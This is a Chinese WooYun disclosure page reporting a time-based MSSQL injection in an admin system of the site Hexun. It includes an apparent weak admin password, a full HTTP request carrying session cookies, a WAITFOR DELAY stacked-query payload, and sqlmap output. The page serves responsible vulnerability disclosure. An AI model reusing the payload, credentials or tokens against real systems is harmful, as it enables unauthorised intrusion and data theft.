当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166407

漏洞标题:和讯网某站MSSQL注入

相关厂商:和讯网

漏洞作者: 路人甲

提交时间:2015-12-31 15:21

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

RT

详细说明:

系统:admin.c.hexun.com
弱口令:wangyong 123456
漏洞地址:

GET /ajax_StockUserDelegate.aspx?action=getpriceandupdownrateyanbao&StockCode=000018* HTTP/1.1
Host: admin.c.hexun.com
Proxy-Connection: keep-alive
Cache-Control: no-cache
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Accept: */*
Referer: http://admin.c.hexun.com/StrategistStocks.aspx
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_119f2e7b7e9592c4b75523650e9069f4=1451489331; ASP.NET_SessionId=um5lfe55b40o2l45vsoatxq5; userToken=2620786%7c0000%7c0%2c9mbCEvU9Kc%2f3mpT82mmBMsJGU8bjm31jn2GHNZIFD9Sr0Mjd6V%2bGF%2b79UJn4GXmg00PUJ%2f7QGnwkGPjem9UAyEDG%2fxgYwHSOJMTxeJLjjF4aWJBoUTj0AVt1%2bfEQ3fDY%2byZON2%2fpkpsCmMvXEN%2fSSiFVY6eeRBFKy1Notyba3KdpNeJirIge5Ttu%2b0lh2GRwEoAWyeW0hiXyR44XJSXjiw%3d%3d; hxck_fsd_lcksso=765785F554A89C313B517A73DFE6F817866360570ED0E3AEABC0B4BEB8B31643814CA63C62A50BDD9B5381FE3987AECFDCB8001F6551B1658C6C0A6EAC3C42887994EEA78F3956C72CC92C6840F049781B997532BE1C4BC240D306949FDACDF20A75EE728A429A04; hxck_sq_common=LoginStateCookie=xRe%2fs5mlwBW0ZQoTrSbr3A%3d%3d&SnapCookie=rSQEfTWsEuzkFgRSXSoq8oneeW5fMiypIyUE07rNpPSBBCOePRlbdBZp7po9fRhX6TTEn%2f%2fNMx3SWrhRX2VygP9oPekTxqsqS4LvYywJwBY%3d; Hm_lvt_24a7d100412d258ddcc6909dd896d4cf=1451488593,1451543486; Hm_lpvt_24a7d100412d258ddcc6909dd896d4cf=1451543757


StockCode参数存在时间注入

---
Parameter: #1* (URI)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://admin.c.hexun.com:80/ajax_StockUserDelegate.aspx?action=getp
riceandupdownrateyanbao&StockCode=000018';WAITFOR DELAY '0:0:5'--
---
[14:42:10] [INFO] testing Microsoft SQL Server
[14:42:10] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
[14:42:20] [INFO] confirming Microsoft SQL Server
[14:42:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005>

漏洞证明:

数据库.png


能跑数据,跑得实在太慢,就不一一跑数据库了

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-31 15:33

厂商回复:

处理中

最新状态:

暂无

漏洞评价:

评价